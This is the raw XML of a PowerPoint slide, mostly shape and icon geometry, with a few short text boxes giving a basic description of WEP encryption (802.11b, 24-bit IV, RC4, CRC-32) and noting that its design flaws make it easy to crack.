                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="410" y="438"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234" y="191"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="234" y="191"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="191"/>
                    <a:pt x="205" y="176"/>
                    <a:pt x="205" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="106"/>
                    <a:pt x="205" y="106"/>
                    <a:pt x="205" y="106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410" y="191"/>
                    <a:pt x="410" y="191"/>
                    <a:pt x="410" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="191"/>
                    <a:pt x="290" y="191"/>
                    <a:pt x="290" y="191"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="234" y="19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wrap="none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79" name="Freeform 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA19F50-91D8-4CD5-AA94-0B860ECDD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2969" y="4361598"/>
              <a:ext cx="279336" cy="253942"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 178824 w 602"/>
                <a:gd name="T1" fmla="*/ 217126 h 602"/>
                <a:gd name="T2" fmla="*/ 178824 w 602"/>
                <a:gd name="T3" fmla="*/ 217126 h 602"/>
                <a:gd name="T4" fmla="*/ 0 w 602"/>
                <a:gd name="T5" fmla="*/ 35766 h 602"/>
                <a:gd name="T6" fmla="*/ 0 w 602"/>
                <a:gd name="T7" fmla="*/ 0 h 602"/>
                <a:gd name="T8" fmla="*/ 217118 w 602"/>
                <a:gd name="T9" fmla="*/ 217126 h 602"/>
                <a:gd name="T10" fmla="*/ 178824 w 602"/>
                <a:gd name="T11" fmla="*/ 217126 h 602"/>
                <a:gd name="T12" fmla="*/ 138002 w 602"/>
                <a:gd name="T13" fmla="*/ 217126 h 602"/>
                <a:gd name="T14" fmla="*/ 138002 w 602"/>
                <a:gd name="T15" fmla="*/ 217126 h 602"/>
                <a:gd name="T16" fmla="*/ 102237 w 602"/>
                <a:gd name="T17" fmla="*/ 217126 h 602"/>
                <a:gd name="T18" fmla="*/ 0 w 602"/>
                <a:gd name="T19" fmla="*/ 114885 h 602"/>
                <a:gd name="T20" fmla="*/ 0 w 602"/>
                <a:gd name="T21" fmla="*/ 76590 h 602"/>
                <a:gd name="T22" fmla="*/ 138002 w 602"/>
                <a:gd name="T23" fmla="*/ 217126 h 602"/>
                <a:gd name="T24" fmla="*/ 25650 w 602"/>
                <a:gd name="T25" fmla="*/ 163657 h 602"/>
                <a:gd name="T26" fmla="*/ 25650 w 602"/>
                <a:gd name="T27" fmla="*/ 163657 h 602"/>
                <a:gd name="T28" fmla="*/ 53467 w 602"/>
                <a:gd name="T29" fmla="*/ 188946 h 602"/>
                <a:gd name="T30" fmla="*/ 25650 w 602"/>
                <a:gd name="T31" fmla="*/ 217126 h 602"/>
                <a:gd name="T32" fmla="*/ 0 w 602"/>
                <a:gd name="T33" fmla="*/ 188946 h 602"/>
                <a:gd name="T34" fmla="*/ 25650 w 602"/>
                <a:gd name="T35" fmla="*/ 163657 h 60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02" h="602">
                  <a:moveTo>
                    <a:pt x="495" y="601"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495" y="601"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="325"/>
                    <a:pt x="276" y="99"/>
                    <a:pt x="0" y="9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32" y="0"/>
                    <a:pt x="601" y="269"/>
                    <a:pt x="601" y="601"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="495" y="601"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="382" y="601"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="382" y="601"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="601"/>
                    <a:pt x="283" y="601"/>
                    <a:pt x="283" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="446"/>
                    <a:pt x="155" y="318"/>
                    <a:pt x="0" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="212"/>
                    <a:pt x="0" y="212"/>
                    <a:pt x="0" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="212"/>
                    <a:pt x="382" y="389"/>
                    <a:pt x="382" y="601"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="453"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71" y="453"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="453"/>
                    <a:pt x="148" y="481"/>
                    <a:pt x="148" y="523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="566"/>
                    <a:pt x="113" y="601"/>
                    <a:pt x="71" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="601"/>
                    <a:pt x="0" y="566"/>
                    <a:pt x="0" y="523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="481"/>
                    <a:pt x="28" y="453"/>
                    <a:pt x="71" y="45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80" name="Freeform 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F79951-3BE4-41D5-B9E2-62041391DD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33892" y="5140097"/>
              <a:ext cx="285773" cy="360860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="180" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="167" y="34"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="62" y="14"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="35" y="47"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="132"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="17" y="136"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="156"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="276"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="295"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="185" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="205" y="286"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="207" y="161"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="205" y="150"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="185" y="134"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="47" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="51" y="54"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="71" y="29"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="20"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="125" y="24"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="151" y="45"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="160" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="47" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="187" y="279"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="180" y="285"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="24" y="283"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="18" y="276"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="18" y="158"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="152"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="183" y="152"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="189" y="161"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="113" y="190"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="111" y="183"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="179"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="187"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="212"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="85" y="223"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="85" y="236"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="246"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="241"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="122" y="228"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="214"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="207" h="303">
                  <a:moveTo>
                    <a:pt x="180" y="132"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="2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89" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0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2" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27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5" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="132"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="47" y="76"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="76"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="189" y="276"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="189" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="276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8" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="276"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="113" y="212"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="236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3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="21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81443189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" name="Picture Placeholder 40" descr="Steel gears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979" b="59252"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8469902" y="1206424"/>
            <a:ext cx="3146296" cy="519284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture Placeholder 10" descr="Steel gears"/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979" b="59253"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586264" y="1206424"/>
            <a:ext cx="3146296" cy="519284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture Placeholder 39" descr="Steel gears"/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979" b="59253"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4533992" y="1206423"/>
            <a:ext cx="3146296" cy="519285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4576807" y="1739740"/>
            <a:ext cx="3145281" cy="1417858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11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srgbClr val="222222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WEP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uses a 24-bit initialization vector (IV)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srgbClr val="222222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to form stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity of wireless transmissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8488835" y="1739740"/>
            <a:ext cx="3127363" cy="894638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11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srgbClr val="222222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has significant vulnerabilities and design flaws and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can therefore be easily cracked</a:t>
            </a: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579120" y="1739740"/>
            <a:ext cx="3342188" cy="1417858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11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srgbClr val="222222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WEP is a security protocol defined by the 802.11b standard; it was designed to provide a wireless LAN with a level of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security and privacy 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srgbClr val="222222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comparable to that of a wired LAN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C4B31E8-2047-42DA-B75A-AEC93E040AC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026856" y="191869"/>
            <a:ext cx="10138289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Wired Equivalent Privacy (WEP) Encryption</a:t>
            </a:r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B82A222A-7A24-4CFE-99DA-02FD33CDB3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2485644" y="3309366"/>
            <a:ext cx="9237234" cy="3135567"/>
            <a:chOff x="2590800" y="3244596"/>
            <a:chExt cx="9237234" cy="3135567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D28B3F79-7A72-4674-B307-7694BEE1B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800" y="5156099"/>
              <a:ext cx="2360203" cy="687622"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="50000"/>
                </a:sysClr>
              </a:solidFill>
              <a:prstDash val="sysDot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0" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C3CFE00-7DBA-4FA2-90E0-39F676886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3949" y="3589407"/>
              <a:ext cx="2373503" cy="687622"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="50000"/>
                </a:sysClr>
              </a:solidFill>
              <a:prstDash val="sysDot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1" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4531CDE9-0115-4104-8936-60951D31C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8034" y="5149296"/>
              <a:ext cx="3720000" cy="687622"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="50000"/>
                </a:sysClr>
              </a:solidFill>
              <a:prstDash val="sysDot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4AE53CEC-90CB-4B6E-A8A9-EC5F7917B2BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7150601" y="4459796"/>
              <a:ext cx="376109" cy="30777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rPr>
                <a:t>-</a:t>
              </a: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234622A7-60DE-425E-815F-12377BF88FBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7224578" y="4484598"/>
              <a:ext cx="245970" cy="30777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rPr>
                <a:t>-</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="144" name="Straight Arrow Connector 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1C700C-AA90-441D-9C27-79A70BBFBCB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7336481" y="4847378"/>
              <a:ext cx="0" cy="416129"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="145" name="Straight Arrow Connector 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2773DA-182B-492A-8E96-CB783D039221}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7336481" y="4271893"/>
              <a:ext cx="0" cy="319032"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="146" name="Elbow Connector 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C63E61E2-892C-4E48-8383-D49CC469C101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="6539482" y="3680953"/>
              <a:ext cx="51229" cy="4161293"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -752612"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8D1AD7-3706-4AE3-ACD2-87113FD70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939" y="3244596"/>
              <a:ext cx="2016692" cy="853813"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:ln w="25400">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="65000"/>
                </a:sysClr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48" name="AutoShape 13">
              <a:extLst>
